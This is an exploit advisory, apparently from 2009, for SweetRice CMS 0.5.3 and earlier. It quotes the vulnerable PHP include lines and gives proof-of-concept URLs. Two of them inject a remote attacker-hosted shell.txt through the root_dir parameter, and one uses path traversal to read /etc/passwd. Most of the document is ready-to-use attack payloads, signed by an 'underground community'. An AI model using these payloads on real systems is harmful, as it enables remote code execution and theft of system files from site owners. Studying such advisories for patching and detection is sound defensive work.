SweetRice versions 0.5.3 and below suffer from remote and local file inclusion vulnerabilities.
529a5da49d0b6735fd6024195c512d6d1c1fe7308164187db46fa70472b8ee78
[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#SweetRice <= 0.5.3 Multiple Remote Vulnerability
#Download Script : https://www.basic-cms.org/
#Dork : die("lamers attempt"); :P
########################################################################
#
#RFI Vuln : ./sweetrice/_plugin/subscriber/inc/post.php (line 2)
# <?php
# include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;
# ?>
#PoC : https://[target]/[path]/_plugin/subscriber/inc/post.php?root_dir=https://[attacker]/shell.txt???
#
#RFI Vuln : ./sweetrice/as/lib/news_modify.php (line 2)
# <?php
# include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;
# ?>
#PoC : https://[target]/[path]/as/lib/news_modify.php?root_dir=https://[attacker]/shell.txt???
#
########################################################################
#LFI Vuln : ./sweetrice/as/lib/plugins.php
# <?php
# if(file_exists('../_plugin/'.$plugin.'/plugin_config.php'))
# {
# include('../_plugin/'.$plugin.'/plugin_config.php');
# ?>
#PoC : https://[target]/[path]/as/lib/plugins.php?plugin=../../../../../../etc/passwd
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################
[ Gorontalo / 2009 ]